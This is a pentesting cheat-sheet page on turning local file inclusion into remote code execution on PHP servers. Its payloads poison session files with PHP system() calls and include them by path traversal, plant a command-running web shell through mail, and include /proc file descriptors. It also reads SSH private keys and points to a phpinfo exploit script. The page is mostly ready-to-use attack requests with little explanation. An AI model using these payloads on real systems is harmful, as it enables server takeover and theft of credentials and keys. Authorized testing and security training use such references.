pwny.cc
Search…
LFI to RCE

Php sessions method

1
#Check if the website use PHP
2
SESSIDSet-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
3
Set-Cookie: user=admin; expires=Tue, 30-Jun-2020 10:25:29 GMT; path=/; httponly
4
5
#In php sessions are store into /var/lib/php5/sess_PHPSESSID files
6
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
7
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
8
9
#Set the cookie to <?php system("whoami"); ?>
10
login=1&user=<?php system("whoami");?>&pass=password&lang=en_us.php​
11
12
#Use the LFI to include the PHP session file
13
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2​
Copied!

Email method

1
#Send a mail to internal account ([email protected]) containing:
2
<?php echo system($_REQUEST["cmd"]); ?>
3
#Access to the mail (/var/mail/USER&cmd=whoami)
Copied!

/proc/*/fd/* method

1
#Upload a lot of shells
2
http://web.com/index.php?page=/proc/$PID/fd/$FD
3
#$PID = PID of the proccess (can be bruteforced)
4
#$FD = filedescriptor (can be bruteforced)
Copied!

Ssh method

1
#Check which user is being used (/proc/self/status - /etc/passwd)
2
/home/hax0r/.ssh/id_rsa #hax0r = User is being used
Copied!

Phpinfo() method

To exploit this you need: page where phpinfo() is displayed, "file_uploads=on" and the server has to be able to write in "/tmp" directory.
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py
Script to exploit Phpinfo() method